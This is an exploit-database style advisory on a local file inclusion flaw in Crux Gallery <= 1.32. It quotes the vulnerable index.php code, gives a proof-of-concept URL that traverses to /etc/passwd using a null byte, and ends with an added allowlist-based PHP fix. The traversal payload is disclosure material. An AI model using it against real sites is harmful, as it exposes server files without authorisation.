
Crux Gallery <= 1.32 (index.php theme) Local File Inclusion Vulnerability

Author: StAkeR
Risk: Security Risk Unsorted
0day-ID: 0day-ID-3818
Category: web applications
Date add: 30-09-2008
Platform: unsorted
 ~~+=========================================================+~~
  [!] Crux Gallery <= 1.32 Local File Inclusion Vulnerability
  [?] Discovered On: 01/10/2008
  [*] PHP.ini 
  [*] Magic_Quotes_Gpc = Off
 ~~+=========================================================+~~
  (index.php, lines 14-18) // Greetz -> Osirys and darkjoker
  $m = $_GET['m'];
  $p = $_GET['p'];
  $dir = $_GET['dir'];
  require_once("main.php");
  require_once("themes/".$theme."/theme.php"); // $theme is used here without being declared
  $theme isn't declared before it is used in the require_once path, so you can include any file.
  [*] http://[path]/index.php?theme=../../../../../etc/passwd%00
  [*] How To Fix: declare $theme
  ~~+=========================================================+~~
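
  The fix named above ("declare $theme"), carried one step further as an added example that is not part of the original advisory or of Crux Gallery's code: the value is set explicitly and accepted only if it exactly names an installed theme. resolve_theme(), DEFAULT_THEME and the temporary demo directory are assumptions made for this illustration.

```php
<?php
// Added example, not Crux Gallery code; resolve_theme() and DEFAULT_THEME
// are hypothetical names.
const DEFAULT_THEME = 'default';

// Map a request value to themes/<name>/theme.php, falling back to the
// default theme unless the value names an installed theme exactly.
function resolve_theme(string $themesDir, $requested): string
{
    $base = realpath($themesDir);
    if ($base === false) {
        throw new RuntimeException('themes directory not found');
    }
    // Allowlist: directories on disk that contain a theme.php.
    $installed = [];
    foreach (scandir($base) as $entry) {
        if ($entry[0] !== '.' && is_file("$base/$entry/theme.php")) {
            $installed[] = $entry;
        }
    }
    // Strict match only, so "../", NUL bytes and arrays (theme[]=x)
    // never reach a filesystem call.
    $name = DEFAULT_THEME;
    if (is_string($requested) && in_array($requested, $installed, true)) {
        $name = $requested;
    }
    // Defence in depth: the resolved file must stay under $base
    // (catches a symlinked theme directory).
    $file = realpath("$base/$name/theme.php");
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($file === false || strncmp($file, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('theme file outside themes directory');
    }
    return $file;
}

// Constructed demo tree: <tmp>/themes/{default,dark}/theme.php
$root = sys_get_temp_dir() . '/theme_demo_' . getmypid();
foreach (['default', 'dark'] as $t) {
    @mkdir("$root/themes/$t", 0700, true);
    file_put_contents("$root/themes/$t/theme.php", "<?php // $t\n");
}
// Constructed request values, including the traversal string from above.
$inputs = ['dark', '../../../../../etc/passwd' . "\0", ['x'], null];
foreach ($inputs as $in) {
    echo basename(dirname(resolve_theme("$root/themes", $in))), "\n";
}
// In index.php: require_once resolve_theme(__DIR__ . '/themes', $_GET['theme'] ?? null);
```

  Only the first constructed input resolves to a non-default theme; the traversal string, the array and the missing parameter all fall back to the default theme's file.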